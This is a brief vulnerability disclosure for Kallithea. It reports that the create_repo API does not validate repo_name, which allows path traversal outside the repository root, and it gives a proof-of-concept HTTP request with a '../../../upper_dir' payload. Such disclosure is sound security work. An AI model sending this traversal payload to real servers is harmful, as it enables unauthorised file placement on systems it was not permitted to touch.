This vulnerability allows a normal user to clone a repository to a filesystem path outside the Kallithea repository root.
repo_name inside create_repo API call is not properly validated.
It's possible to set it to something like: ../../../upper_dir
More info here.
POC:
You need proper API key for this.
GET /_admin/api HTTP/1.1
Host: localhost:5000
Connection: close
Content-Length: 126
{"id":1,"api_key":"your_api_key","method":"create_repo","args":{"repo_name":"../../../upper_dir"}}